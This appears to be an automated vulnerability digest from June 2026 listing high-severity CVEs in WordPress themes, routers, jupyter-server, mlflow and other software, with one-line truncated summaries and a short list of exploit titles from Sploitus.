- CVE-2025-69369 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes…
- CVE-2025-68886 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in androThemes…
- CVE-2025-58897 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes…
- CVE-2025-58707 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes…
- CVE-2026-39551 (High, CVSS 8.1) - Deserialization of Untrusted Data vulnerability in Elated-Themes Töbel allows Object Injection. This issue affects Töbel: from n/a…
- CVE-2026-39550 (High, CVSS 8.1) - Deserialization of Untrusted Data vulnerability in Elated-Themes Aperitif allows Object Injection. This issue affects Aperitif: from…
- CVE-2025-58705 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes…
- CVE-2025-53440 (High, CVSS 8.1) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes…
- CVE-2026-5422 (High, CVSS 8.1) - A path traversal vulnerability exists in jupyter-server version 2.17.0 due to an incorrect root directory boundary check in the…
- CVE-2025-14773 (High, CVSS 8.0) - Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in ABB T-MAC Plus. This issue…
- CVE-2026-40290 (High, CVSS 7.8) - OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using…
- CVE-2022-49042 (High, CVSS 7.8) - An inclusion of functionality from untrusted control sphere vulnerability in MinGW DLL component in Synology Hyper Backup Explorer…
- CVE-2022-49036 (High, CVSS 7.8) - An inclusion of functionality from untrusted control sphere vulnerability in OpenSSL configuration in Synology Active Backup for…
- CVE-2026-4035 (High, CVSS 7.7) - A vulnerability in mlflow/mlflow versions prior to 3.11.0 allows for the resolution of environment variables in AI Gateway secrets,…
- CVE-2025-15655 (High, CVSS 7.6) - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla School Management allows…
- CVE-2026-37462 (High, CVSS 7.5) - An integer underflow in the BGPUpdate.DecodeFromBytes function (/bgp/bgp.go) of gobgp v4.3.0 allows attackers to cause a Denial of…
- CVE-2026-41032 (High, CVSS 7.5) - It is possible for an unauthenticated adjacent attacker to download log files of the controller, which may disclose some restricted…
- CVE-2026-50031 (High, CVSS 7.5) - ipmi-oem in FreeIPMI before 1.6.18 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface…
- CVE-2026-9516 (High, CVSS 7.5) - Cpanel::JSON::XS versions before 4.41 for Perl allow denial of service via UTF-8 BOM prefixed input when a decode filter callback…
- CVE-2026-10621 (High, CVSS 7.5) - Path traversal in restore handler in Collibra Agent, allows an attacker to write arbitrary files via a crafted ZIP archive. Collibra…
- CVE-2026-42670 (High, CVSS 7.5) - Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly…
- CVE-2026-42669 (High, CVSS 7.5) - Missing Authorization vulnerability in EventPrime allows Exploiting Incorrectly Configured Access Control Security Levels. This issue…
- CVE-2025-58024 (High, CVSS 7.5) - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in UnboundStudio…
- CVE-2025-14774 (High, CVSS 7.4) - Incorrect Authorization vulnerability in ABB T-MAC Plus. This issue affects T-MAC Plus: 4.0-24. Product: abb t-mac_plus
- CVE-2026-10629 (High, CVSS 7.4) - SIP signaling stack in Verizon IMS (unspecified version) implements SIP signaling without IPsec integrity protection (missing…
- CVE-2026-36611 (High, CVSS 7.3) - Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of uninitialized buffer when receiving POST requests without…
- CVE-2026-36609 (High, CVSS 7.3) - Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 uses a static authentication nonce that does not change between…
- CVE-2026-10704 (High, CVSS 7.3) - A vulnerability was detected in SourceCodester Pizzafy E-Commerce System 1.0. Affected by this vulnerability is the function Login of…
- CVE-2026-9334 (High, CVSS 7.3) - Cpanel::JSON::XS versions before 4.41 for Perl allow type confusion via duplicate object keys when dupkeys_as_arrayref is enabled.…
- CVE-2026-10694 (High, CVSS 7.3) - A vulnerability was detected in SourceCodester Online Food Ordering System 2.0. Affected by this issue is the function include of the…
- CVE-2026-30649 (High, CVSS 7.3) - Buffer Overflow vulnerability in VIVOTEK INC FD8136-VVTK-0300a allows a remote attacker to execute arbitrary code via the…
- CVE-2026-36606 (High, CVSS 7.1) - Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 encrypts configuration backups with a hardcoded DES key using single…
- CVE-2025-15654 (High, CVSS 7.1) - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fox-themes Prague allows…
- CVE-2026-42685 (High, CVSS 7.1) - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ahmad WP Job Portal allows…
⚔️ Sploitus (60 entries)
Unknown severity (60 entries)
- Poc-PoisonJar exploit
- simplectf exploit
…58 more Unknown-severity entries omitted
🤖 Automated vulnerability intelligence digest · 2026-06-05 · Sources: NVD / GitHub Advisory / Sploitus / CISA-KEV